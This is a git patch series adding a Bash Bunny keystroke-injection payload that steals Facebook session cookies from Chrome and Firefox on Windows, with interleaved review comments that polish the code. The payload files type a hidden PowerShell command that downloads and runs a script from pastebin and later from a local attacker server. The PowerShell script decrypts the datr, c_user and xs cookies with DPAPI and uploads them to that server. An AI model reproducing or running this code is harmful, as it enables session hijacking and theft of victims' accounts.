From 62f185e5ff3474ad2ea52f2bd02b0f49b910eb7d Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:52:40 +0000 Subject: [PATCH 1/6] Add WindowsCookies payload --- payloads/library/WindowsCookies | 1 + 1 file changed, 1 insertion(+) create mode 160000 payloads/library/WindowsCookies diff --git a/payloads/library/WindowsCookies b/payloads/library/WindowsCookies new file mode 160000 index 00000000..de804da4 --- /dev/null +++ b/payloads/library/WindowsCookies @@ -0,0 +1 @@ +Subproject commit de804da450825bf6e47d824da0bff55e3864d01c From 55aeb316af7443cd65922f4f35f62681c0d838bf Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:57:41 +0000 Subject: [PATCH 2/6] fix --- payloads/library/WindowsCookies | 1 - 1 file changed, 1 deletion(-) delete mode 160000 payloads/library/WindowsCookies diff --git a/payloads/library/WindowsCookies b/payloads/library/WindowsCookies deleted file mode 160000 index de804da4..00000000 --- a/payloads/library/WindowsCookies +++ /dev/null @@ -1 +0,0 @@ -Subproject commit de804da450825bf6e47d824da0bff55e3864d01c From 1ecaddbf55c68a1608b4a6919515a63957843cdc Mon Sep 17 00:00:00 2001 From: oXis Date: Fri, 17 Mar 2017 19:59:11 +0000 Subject: [PATCH 3/6] add WindowsCookies payload --- payloads/library/WindowsCookies/README.md | 18 +++++ .../WindowsCookies/get_facebook_cookies.ps1 | 65 +++++++++++++++++++ payloads/library/WindowsCookies/payload.txt | 48 ++++++++++++++ 3 files changed, 131 insertions(+) create mode 100644 payloads/library/WindowsCookies/README.md create mode 100644 payloads/library/WindowsCookies/get_facebook_cookies.ps1 create mode 100644 payloads/library/WindowsCookies/payload.txt diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md new file mode 100644 index 00000000..ed037be7 --- /dev/null +++ b/payloads/library/WindowsCookies/README.md 
@@ -0,0 +1,18 @@ +# WindowsCookies for Bash Bunnys + +Author: oXis +Version: Version 1.0 +Credit: illwill, sekirkity, EmpireProject + +## Description + +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Only payload.txt is required, powershell script is here only if you want to modify it. + +## Payload LED STATUS + +| LED | Status | +| ---------------- | -------------------------------------- | +| Blue (blinking) | Payload init | +| Purple (blinking)| Done | diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 new file mode 100644 index 00000000..8233e8b6 --- /dev/null +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 
@@ -0,0 +1,65 @@ +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "datr is $DecPwd" + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # 
[System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "c_user is $DecPwd" + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + + "xs is $DecPwd" +} + +Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt new file mode 100644 index 00000000..0e0a7281 --- /dev/null +++ b/payloads/library/WindowsCookies/payload.txt 
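Review bot: The header documents a different input than the code reads: `# Use: Get-FacebookCreds [path to Login Data]` while the default path, the regexes and the error text all refer to Chrome's `Cookies` database, so the usage line should read `# Use: Get-FacebookCreds [path to Chrome Cookies db]`. The same header says "import the module, then perform the command", yet the last line of the file calls `Get-FacebookCreds` unconditionally, so dot-sourcing or importing the file runs the extraction immediately; either drop that call or state in the header that loading the file executes it. The function's pipeline output is the DPAPI-decrypted `datr`/`c_user`/`xs` values in clear text, which the README does not say; a one-line note that the loot file holds live session credentials and must be handled and deleted accordingly belongs both here and in the README.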
@@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Facebook session cookies dump +# Author: oXis (inspired by illwill) +# Version: 1.0 +# +# Dumps the stored session cookies from Chrome browser by downloading a Powershell script +# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName% +# Credits to these guys for their powershell scripts: +# https://github.com/sekirkity/BrowserGather BrowserGather.ps1 +# https://github.com/EmpireProject/Empire Get-FoxDump.ps1 +# Also credit to illwill for the BrowerCreds payload + +#script +# Blue...............Running Script +# Purple.............Got Browser Creds + +# QUACK SET_LANGUAGE gb +#DUCKY_LANG='fr' + +LED R 200 +LOOTDIR=/root/udisk/loot/FacebookSession +mkdir -p $LOOTDIR + +ATTACKMODE HID STORAGE +LED B 200 + +# wait 6 seconds for the storage to popup +Q DELAY 6000 +Q GUI r +Q DELAY 100 +Q STRING POWERSHELL +Q ENTER +Q DELAY 500 +Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) +Q ENTER +Q DELAY 100 + +#Dump Chrome Creds +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q DELAY 100 +Q STRING exit +Q ENTER +Q DELAY 2000 + +sync +LED R B 200 \ No newline at end of file From 21abacc54f84ee11885db05e83dd6d15543862d5 Mon Sep 17 00:00:00 2001 From: oXis Date: Sat, 18 Mar 2017 12:09:34 +0000 Subject: [PATCH 4/6] add firefox support --- payloads/library/WindowsCookies/README.md | 4 +- .../WindowsCookies/get_facebook_cookies.ps1 | 51 +++++++++++++++++-- payloads/library/WindowsCookies/payload.txt | 4 +- 3 files changed, 53 insertions(+), 6 deletions(-) diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md index ed037be7..8714a9b2 100644 --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md 
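Review bot: The `Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)…` line executes whatever that public paste serves at run time, fetched over plain HTTP with no pinning or integrity check, so the paste owner or anything on the network path controls what runs on the host, and the payload silently breaks if the paste is edited or removed; the README should state this external dependency, and the script should be shipped with the payload rather than fetched. The 4/6 hunk of payload.txt adds a second fetch of the same URL for the Firefox call, doubling that exposure, and the 6/6 patch replaces both with a locally served copy, which resolves the point for the final revision. The LED comments say `Purple.............Got Browser Creds` while the final command is `LED R B 200`; a short `# red+blue = purple` note would keep the two in sync for readers who do not know the colour mixing.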
@@ -6,8 +6,8 @@ Credit: illwill, sekirkity, EmpireProject ## Description -Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession -Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. Only payload.txt is required, powershell script is here only if you want to modify it. ## Payload LED STATUS diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 index 8233e8b6..c9214787 100644 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 
@@ -4,7 +4,54 @@ # Use: Get-FacebookCreds [path to Login Data] # Path is optional, use if automatic search doesn't work -function Get-FacebookCreds() { +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches.groups[1] + + "datr is $datr" + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches.groups[1] + + "c_user is $c_user" + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches.groups[1] + + "xs is $xs" +} + +function Get-FacebookCreds-Chrome() { Param( [String]$Path ) 
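Review bot: The failure branch of the new `Get-FacebookCreds-Firefox` still reports `Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'`, copied from the Chrome variant, so a missing Firefox profile is reported as a Chrome problem; it should read `Write-Error 'Firefox cookies.sqlite not found, or invalid file path specified.'`. The file header above the hunk (`# Chrome Facebook cookies extraction` / `# Use: Get-FacebookCreds [path to Login Data]`) now names a function that no longer exists and omits Firefox; it should list `Get-FacebookCreds-Chrome` and `Get-FacebookCreds-Firefox` with their respective default paths. Both names carry two hyphens, which breaks PowerShell's Verb-Noun convention and any `Get-Verb`-based lint; `Get-FacebookCookiesFromFirefox` / `Get-FacebookCookiesFromChrome` would be conventional. The commented-out Chrome path left inside the Firefox function is dead text and should go. The `Get-FacebookCreds-Chrome` body starts at the end of this hunk and continues outside it.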
@@ -61,5 +108,3 @@ function Get-FacebookCreds() { "xs is $DecPwd" } - -Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 0e0a7281..3a880a0b 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -37,7 +37,9 @@ Q ENTER Q DELAY 100 #Dump Chrome Creds -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit From e60512e4a133640da38b8aa905999556853ba5e0 Mon Sep 17 00:00:00 2001 From: oXis Date: Sat, 18 Mar 2017 12:25:03 +0000 Subject: [PATCH 5/6] fix delay --- payloads/library/WindowsCookies/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 3a880a0b..271c33d4 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt 
@@ -39,6 +39,7 @@ Q DELAY 100 #Dump Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER +Q DELAY 200 Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER Q DELAY 100 @@ -47,4 +48,4 @@ Q ENTER Q DELAY 2000 sync -LED R B 200 \ No newline at end of file +LED R B 200 From 10966f7dc8666567f26e319b2a46ffc297f13269 Mon Sep 17 00:00:00 2001 From: oXis Date: Thu, 23 Mar 2017 20:18:37 +0000 Subject: [PATCH 6/6] New version, fully offline --- payloads/library/WindowsCookies/README.md | 9 +- .../WindowsCookies/get_facebook_cookies.ps1 | 30 +++-- payloads/library/WindowsCookies/p | 118 ++++++++++++++++++ payloads/library/WindowsCookies/payload.txt | 45 +++---- payloads/library/WindowsCookies/server.py | 33 +++++ 5 files changed, 194 insertions(+), 41 deletions(-) create mode 100644 payloads/library/WindowsCookies/p create mode 100644 payloads/library/WindowsCookies/server.py diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md index 8714a9b2..c5ff331b 100644 --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md 
@@ -1,18 +1,21 @@ # WindowsCookies for Bash Bunnys Author: oXis -Version: Version 1.0 +Version: Version 2.0 Credit: illwill, sekirkity, EmpireProject ## Description Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. -Only payload.txt is required, powershell script is here only if you want to modify it. +Only payload.txt, server.py and p are required. +Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it. ## Payload LED STATUS | LED | Status | | ---------------- | -------------------------------------- | | Blue (blinking) | Payload init | -| Purple (blinking)| Done | +| White (blinking) | Setup RNDIS_ETHERNET | +| Green (blinking) | Done | + diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 index c9214787..b3eabccc 100644 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 
@@ -34,21 +34,20 @@ function Get-FacebookCreds-Firefox() { $PwdMatches = $PwdRegex.Matches($BinaryText) $datr = $PwdMatches.groups[1] - "datr is $datr" - # First the magic bytes for the facebook string, c_user size is 15 $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' $PwdMatches = $PwdRegex.Matches($BinaryText) $c_user = $PwdMatches.groups[1] - "c_user is $c_user" - # First the magic bytes for the facebook string, xs size is 44 $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' $PwdMatches = $PwdRegex.Matches($BinaryText) $xs = $PwdMatches.groups[1] - "xs is $xs" + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" } function Get-FacebookCreds-Chrome() { @@ -82,9 +81,8 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) - "datr is $DecPwd" # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' 
@@ -93,9 +91,8 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $c_user = [System.Text.Encoding]::Default.GetString($Decrypt) - "c_user is $DecPwd" # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' @@ -104,7 +101,18 @@ function Get-FacebookCreds-Chrome() { # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) - $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) - "xs is $DecPwd" } diff --git a/payloads/library/WindowsCookies/p b/payloads/library/WindowsCookies/p new file mode 100644 index 00000000..b3eabccc --- /dev/null +++ b/payloads/library/WindowsCookies/p 
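Review bot: `Payload` wraps each `UploadString` call in `Invoke-Expression`, so whatever body the HTTP server answers with is evaluated as PowerShell on the host; `server.py` in this patch sends an empty reply, but any device that answers on 172.16.64.1:8080 first, or a later change to the server, turns that into arbitrary code execution through the payload itself. The upload needs no evaluation: `$null = (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))`, and the same for the Firefox call. The new `"$env:computername ---> "` / `"… ###"` lines replace the old per-value output as the function's pipeline output, which is what gets posted; a comment such as `# output format consumed by server.py: one record per host, fields separated by ###` would tell the next reader that these strings are a wire format and not free text.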
@@ -0,0 +1,118 @@ +# Instructions: import the module, then perform the commanded needed. + +# Chrome Facebook cookies extraction +# Use: Get-FacebookCreds [path to Login Data] +# Path is optional, use if automatic search doesn't work + +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches.groups[1] + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches.groups[1] + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + +function 
Get-FacebookCreds-Chrome() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $datr = [System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $c_user = 
[System.Text.Encoding]::Default.GetString($Decrypt) + + + # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73 + $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + + # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2])); + $Pwd = $Encoding.GetBytes($PwdMatches.groups[2]) + $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser) + $xs = [System.Text.Encoding]::Default.GetString($Decrypt) + + "$env:computername ---> " + "datr is $datr ###" + "c_user is $c_user ###" + "xs is $xs ###" +} + + +function Payload() { + + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome)) + Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox)) + +} diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 271c33d4..d87ad3e2 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt 
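Review bot: `p` is a byte-for-byte copy of `get_facebook_cookies.ps1` — both land on blob `b3eabccc` in this patch — kept only because `server.py` serves `pjoin(curdir, 'p')`, and two copies of the same script will drift the first time one is edited. Have `server.py` serve the script directly (`get_path = pjoin(curdir, 'get_facebook_cookies.ps1')`), or document in the README that `p` must be regenerated from the `.ps1` after every change. The copy also inherits the stale header (`# Use: Get-FacebookCreds [path to Login Data]`), which names a function that no longer exists in either file.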
@@ -2,50 +2,41 @@ # # Title: Facebook session cookies dump # Author: oXis (inspired by illwill) -# Version: 1.0 +# Version: 2.0 # # Dumps the stored session cookies from Chrome browser by downloading a Powershell script -# then stashes them in /root/udisk/loot/FacebookSession/%ComputerName% +# then stashes them in /root/udisk/loot/FacebookSession/l # Credits to these guys for their powershell scripts: # https://github.com/sekirkity/BrowserGather BrowserGather.ps1 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1 # Also credit to illwill for the BrowerCreds payload #script -# Blue...............Running Script -# Purple.............Got Browser Creds +# Blue..............Running Script +# White.............Setup RNDIS_ETHERNET +# Green.............Got Browser Creds +LED B 200 +source bunny_helpers.sh # QUACK SET_LANGUAGE gb -#DUCKY_LANG='fr' +DUCKY_LANG='fr' -LED R 200 LOOTDIR=/root/udisk/loot/FacebookSession mkdir -p $LOOTDIR -ATTACKMODE HID STORAGE -LED B 200 +ATTACKMODE HID -# wait 6 seconds for the storage to popup -Q DELAY 6000 +cd /root/udisk/payloads/$SWITCH_POSITION/ +./server.py & +sleep 1 + +#Dump Chrome Cookies Q GUI r Q DELAY 100 -Q STRING POWERSHELL +Q STRING "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\"" Q ENTER -Q DELAY 500 -Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) -Q ENTER -Q DELAY 100 -#Dump Chrome Creds -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt -Q ENTER -Q DELAY 200 -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append 
